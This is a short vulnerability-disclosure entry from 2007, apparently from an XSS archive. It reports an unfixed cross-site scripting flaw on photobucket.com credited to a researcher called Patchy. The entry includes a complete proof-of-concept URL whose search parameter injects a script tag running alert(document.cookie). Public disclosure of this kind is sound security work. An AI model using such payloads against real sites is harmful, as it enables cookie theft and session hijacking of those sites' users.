Security researcher Patchy, has submitted on 10/02/2007 a cross-site-scripting (XSS) vulnerability affecting photobucket.com, which at the time of submission ranked 64 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/02/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 10/02/2007 |
Date published: 10/02/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Patchy |
Domain: photobucket.com |
Category: XSS |
Pagerank: 64 |
URL: http://photobucket.com/websearch.php?q=%22%3E%3C%2Fa%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fs cript%3E&pbSearch=true&domains=photobucket.com&client=pub-6859639721029573&channel=1948478515&safe=a ctive&cof=GALT%3A666666%3BDIV%3AD3D3D3%3BVLC%3A0000FF%3BALC%3A0000FF%3BLC%3A0000FF%3BBGC%3AFFFFFF%3B T%3A000000%3BGFNT%3A0000FF%3BGIMP%3A000000%3BS%3Ahttp%3A%2F%2Fphotobucket.com%3BFORID%3A11%3B |
Click here to view the mirror
|
|
|